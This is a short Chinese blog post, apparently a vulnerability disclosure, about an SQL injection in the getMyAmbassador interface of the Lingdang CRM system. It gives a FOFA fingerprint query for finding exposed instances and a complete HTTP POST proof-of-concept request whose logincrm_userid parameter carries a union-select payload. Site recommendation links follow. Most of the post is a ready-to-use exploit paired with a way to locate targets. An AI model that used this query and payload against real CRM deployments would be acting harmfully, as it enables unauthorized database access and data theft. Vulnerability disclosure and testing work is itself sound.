灵当CRM系统接口getMyAmbassador存在SQL注入漏洞

0x大先生2025-01-03 15:55

灵当CRM系统接口getMyAmbassador存在SQL注入漏洞

灵当CRM系统接口getMyAmbassador存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。

fofa

javascript 复制代码 
body="crmcommon/js/jquery/jquery-1.10.1.min.js" || (body="http://localhost:8088/crm/index.php" && body="ldcrm.base.js")

poc

javascript 复制代码 
POST /crm/WeiXinApp/marketing/index.php?module=Ambassador&action=getMyAmbassador HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Connection: close

logincrm_userid=-1 union select user(),2,3#
相关推荐
小龙在山东3 小时前
memcached的基本使用
数据库·缓存·memcached
亦世凡华、4 小时前
MySQL--》快速提高查询效率:SQL语句优化技巧与实践
数据库·经验分享·sql·mysql·sql优化
不是二师兄的八戒4 小时前
深入 Redis:高级特性与最佳实践
数据库·redis·缓存
XinStar5 小时前
SQL优化——深分页&排序
sql
drebander6 小时前
SQL 分析函数与聚合函数的组合应用
大数据·数据库·sql
蒜蓉大猩猩6 小时前
Node.js - 文件操作
javascript·后端·sql·node.js
LLLuckyGirl~6 小时前
node.js之---集群(Cluster)模块
数据库
德迅云安全杨德俊6 小时前
保护网站日常安全,网站监测能提供哪方面的帮助
网络·安全·web安全
Ming__GoGo6 小时前
MyBatis-plus sql拦截器
java·sql·学习·鉴权·mybatis-plus·过滤·sql拦截
ccmjga6 小时前
Spring Boot 3 配置大全系列 —— 如何配置用户的登录与认证?
java·数据库·spring boot·后端·spring·单元测试·gradle
热门推荐
01渗透测试之SQLMAP工具详解 kali自带SQLmap解释 重点sqlmap --tamper 使用方式详解 搞完你就很nice了02半导体应用系统一些小知识收集(strip&wafer mapping,EAP&scada)03HCIA-datacom数通题库和录播视频资料04新手学习VR全景需要知道的几个问题05【漏洞复现】CVE-2015-3337 Arbitrary File Reading06优化手机性能,解决卡顿问题:关闭这3个微信开关,释放内存空间07物联网中基于WiFi的室内温度检测系统设计08ubuntu22.04.5本地apt源部署09校验 GPT-4 真实性的三个经典问题:快速区分 GPT-3.5 与 GPT-4,并提供免费测试网站10映美精黑白相机IFrameQueueBuffer转halcon的HObject